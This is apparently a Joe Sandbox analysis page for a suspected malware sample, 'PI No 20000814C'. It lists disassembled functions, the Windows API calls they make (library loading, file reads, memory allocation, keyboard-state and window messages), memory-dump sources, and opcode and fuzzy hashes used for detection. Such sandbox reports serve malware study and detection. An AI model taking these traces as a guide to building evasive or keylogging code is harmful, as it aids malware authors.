                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: d3421e69675fa85585a32305ebd82e15edf72d2c45e88b74e65e1f41c10c333b
                                    • Instruction ID: bd3237442d9bf0f1cd2b32ad900e8dd43e8aae234523808a1d3206887434f093
                                    • Opcode Fuzzy Hash: d3421e69675fa85585a32305ebd82e15edf72d2c45e88b74e65e1f41c10c333b
                                    • Instruction Fuzzy Hash: 302121B1A00A0CEBCB149F11EC8576ABFB8FF50760F21856AE885C1490EBB494E0FF45
                                    Function 00F04F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F04D13: FreeLibrary.KERNEL32(00000000,?), ref: 00F04D4D
                                      • Part of subcall function 00F2548B: __wfsopen.LIBCMT ref: 00F25496
                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00FC62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04F6F
                                      • Part of subcall function 00F04CC8: FreeLibrary.KERNEL32(00000000), ref: 00F04D02
                                      • Part of subcall function 00F04DD0: _memmove.LIBCMT ref: 00F04E1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Library$Free$Load__wfsopen_memmove
                                    • String ID:
                                    • API String ID: 1396898556-0
                                    • Opcode ID: 47dc8d7a5f04de4cdec7afd6a6338939508f4ef994cdb97509284846161386f3
                                    • Instruction ID: f437722485decd1ae4cf9dbae43663a201d454346de48c663194f75b0ae3fe58
                                    • Opcode Fuzzy Hash: 47dc8d7a5f04de4cdec7afd6a6338939508f4ef994cdb97509284846161386f3
                                    • Instruction Fuzzy Hash: 99110A7260030AABCB10FF70DC12FAEB7A89F40711F108429F641E71C1DA79AA15BB60
                                    Function 00F401AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 68ef92a118c79125aa92ace748382c3543b10b106b867d80f8c1d61f9ed4ed0c
                                    • Instruction ID: 031fa6ec8dbe89ecfafb31c465a1fb83ca431bc2a3dccec3a85e29425af2f928
                                    • Opcode Fuzzy Hash: 68ef92a118c79125aa92ace748382c3543b10b106b867d80f8c1d61f9ed4ed0c
                                    • Instruction Fuzzy Hash: 03212474A08351CFCB14DF24C844B5ABBE0BF88314F048968E98A577A2D735E849EB52
                                    Function 00F05D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00F05807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00F05D76
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: 52d52d06aa4ba30d8aaba67cbe081c43e1a70e7af449f5280c41ce4421a88187
                                    • Instruction ID: 50da7834b7e87f31ecc4315e3d0f48ef562ce6226b027912c5a68c07057fbbd1
                                    • Opcode Fuzzy Hash: 52d52d06aa4ba30d8aaba67cbe081c43e1a70e7af449f5280c41ce4421a88187
                                    • Instruction Fuzzy Hash: 9F113D31605B059FD7308F15C444B63B7E9EF45B60F10C92EE8AA86690D7B0E945EF60
                                    Function 00F05BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                                    • Instruction ID: 2d427747e3dfe350655b18720fe2b2fd2fb6bb39820649d8000d5cf7489faf40
                                    • Opcode Fuzzy Hash: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                                    • Instruction Fuzzy Hash: 96017CB9600942ABC305EB29D851D26FBA9FF8A3147148159E829C7742DB74EC21DBE0
                                    Function 00F24A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                    • __lock_file.LIBCMT ref: 00F24AD6
                                      • Part of subcall function 00F28D68: __getptd_noexit.LIBCMT ref: 00F28D68
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit__lock_file
                                    • String ID:
                                    • API String ID: 2597487223-0
                                    • Opcode ID: 7ee46a184d4c22b8d26600b44d7b2ee5b2681c46e234783ca3c4cad049f3581a
                                    • Instruction ID: 2b7f85e2a0bf525014b9269b188065ea2fc00ae48bfec90c235e8fa301e66e79
                                    • Opcode Fuzzy Hash: 7ee46a184d4c22b8d26600b44d7b2ee5b2681c46e234783ca3c4cad049f3581a
                                    • Instruction Fuzzy Hash: FDF0AF31942229ABDF61AF64EC0639F36A1AF40365F048518F424AA1D1CBBC9A51FF55
                                    Function 00F04FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,00FC62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04FDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 4b24cdb214c8fe352fb3f03f581f7a79429acc890596374e7b41c71727f7dda3
                                    • Instruction ID: 0c2e9cc8752f5ec0571efcba01d139132d01879f419fb95fa5933dd67c086595
                                    • Opcode Fuzzy Hash: 4b24cdb214c8fe352fb3f03f581f7a79429acc890596374e7b41c71727f7dda3
                                    • Instruction Fuzzy Hash: 65F030B1505712CFC7349F64E494852BBE1BF0432A3248A3EE2D683650C731B844FF40
                                    Function 00F209D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F209F4
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LongNamePath_memmove
                                    • String ID:
                                    • API String ID: 2514874351-0
                                    • Opcode ID: 3eb785bbc7a286284dee15c3fa15d7d4529f77c3b427697e280b1f5763512b52
                                    • Instruction ID: 9308cd6a07b6d364ce8d04747be9876f134225370265cad5ed19f4c55a8e1c9a
                                    • Opcode Fuzzy Hash: 3eb785bbc7a286284dee15c3fa15d7d4529f77c3b427697e280b1f5763512b52
                                    • Instruction Fuzzy Hash: 42E086369052285BC720E6589C05FFAB7ADDFC87A0F0401B5FC0CD7244D964AC819690
                                    Function 00F69129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                    • Instruction ID: 58171dff112913a77e28ae31dd980efcb81baf52daf0ea8ec67695ecb4fdda10
                                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                    • Instruction Fuzzy Hash: 53E092B0508B005FDB348A24D8107E373E4EB06325F00081CF2AA83341EBA2B841DB59
                                    Function 00F05DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00F3E16B,?,?,00000000), ref: 00F05DBF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: 5a5cebbd5bf5a63ac516fefa4b480735d40dfb6d66d7d72b16910bb73d583852
                                    • Instruction ID: b478f277ada195bd5fbb7b1ba231f775b84c98e09290da15ed7d7964b4f48cff
                                    • Opcode Fuzzy Hash: 5a5cebbd5bf5a63ac516fefa4b480735d40dfb6d66d7d72b16910bb73d583852
                                    • Instruction Fuzzy Hash: F1D0C77464020CBFE710DB80DC46FA9777CD705710F200194FD0456290D6B27D549795
                                    Function 00F2548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __wfsopen
                                    • String ID:
                                    • API String ID: 197181222-0
                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                    • Instruction ID: d1af64464abb21aa55d7b5539bdf214aced1a2ee34909c5e4836307a754bc328
                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                    • Instruction Fuzzy Hash: 38B0927684020C77DE012E82FC12A697B199B44A78F808020FB0C1C162A677A6A0A689
                                    Function 00F4220E Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00F4221A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: PathTemp
                                    • String ID:
                                    • API String ID: 2920410445-0
                                    • Opcode ID: 80540b7369705beb2c4ecc4ccb8977e21dd2ba6855a1c776c033c12e5c887ca0
                                    • Instruction ID: 6aad610b463552bc931a29650237fbf337f4fa69d9f71490dad74bd92de5e219
                                    • Opcode Fuzzy Hash: 80540b7369705beb2c4ecc4ccb8977e21dd2ba6855a1c776c033c12e5c887ca0
                                    • Instruction Fuzzy Hash: 4EC0487286402A9FEB19AB50DCA5AB8762CFF10701F1040E5B64695091AAB46B84EF21
                                    Function 00F6D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000002,00000000), ref: 00F6D46A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID:
                                    • API String ID: 1452528299-0
                                    • Opcode ID: e8ceba9d9841e652be6cf62305f3b7dfeabcdb709095842706155690604c834c
                                    • Instruction ID: 20ffa587986e5e26b94e3648daa993215dcecebb27c1ae452afb8eb20629d268
                                    • Opcode Fuzzy Hash: e8ceba9d9841e652be6cf62305f3b7dfeabcdb709095842706155690604c834c
                                    • Instruction Fuzzy Hash: 63716331B083018FC714EF24C891A6AB7E0AF88714F04456DF8968B2E2DF74ED49EB52
                                    Function 00F20E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: bfb2561fdcece2a0de570c068e8870ec1230c446a945548f70af09cfd21078bb
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: E7310572A00516DFC718DF48E584A69F7B6FF59310B258AA5E409CB652DB30EDC1EBC0
                                    Function 018E22FC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 018E2311
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081259592.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction ID: de27947ed80b7006617f9f5b8f3dfea5520b6b9554211d3b3e121448e277638f
                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction Fuzzy Hash: 0FE09A7594010DAFDB00EFA4D54969E7BB5EF04301F1005A1FD05D6691DA309A549A62
                                    Function 018E2300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 018E2311
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081259592.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: bec00c30b551d6ae08dcbc1e220d77b75665442dd1c98cebd0e8a9db1ea8b657
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: CAE0E67594010DDFDB00EFB4D54D69E7FF4EF04301F100561FD01D2281D6309E509A62

                                    Non-executed Functions

                                    Function 00F8CDAC Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 637windowkeyboardnativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00F8CE50
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F8CE91
                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F8CED6
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F8CF00
                                    • SendMessageW.USER32 ref: 00F8CF29
                                    • _wcsncpy.LIBCMT ref: 00F8CFA1
                                    • GetKeyState.USER32(00000011), ref: 00F8CFC2
                                    • GetKeyState.USER32(00000009), ref: 00F8CFCF
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F8CFE5
                                    • GetKeyState.USER32(00000010), ref: 00F8CFEF
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F8D018
                                    • SendMessageW.USER32 ref: 00F8D03F
                                    • SendMessageW.USER32(?,00001030,?,00F8B602), ref: 00F8D145
                                    • SetCapture.USER32(?), ref: 00F8D177
                                    • ClientToScreen.USER32(?,?), ref: 00F8D1DC
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F8D203
                                    • ReleaseCapture.USER32 ref: 00F8D20E
                                    • GetCursorPos.USER32(?), ref: 00F8D248
                                    • ScreenToClient.USER32(?,?), ref: 00F8D255
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F8D2B1
                                    • SendMessageW.USER32 ref: 00F8D2DF
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F8D31C
                                    • SendMessageW.USER32 ref: 00F8D34B
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F8D36C
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F8D37B
                                    • GetCursorPos.USER32(?), ref: 00F8D39B
                                    • ScreenToClient.USER32(?,?), ref: 00F8D3A8
                                    • GetParent.USER32(?), ref: 00F8D3C8
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F8D431
                                    • SendMessageW.USER32 ref: 00F8D462
                                    • ClientToScreen.USER32(?,?), ref: 00F8D4C0
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F8D4F0
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F8D51A
                                    • SendMessageW.USER32 ref: 00F8D53D
                                    • ClientToScreen.USER32(?,?), ref: 00F8D58F
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F8D5C3
                                      • Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F8D65F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
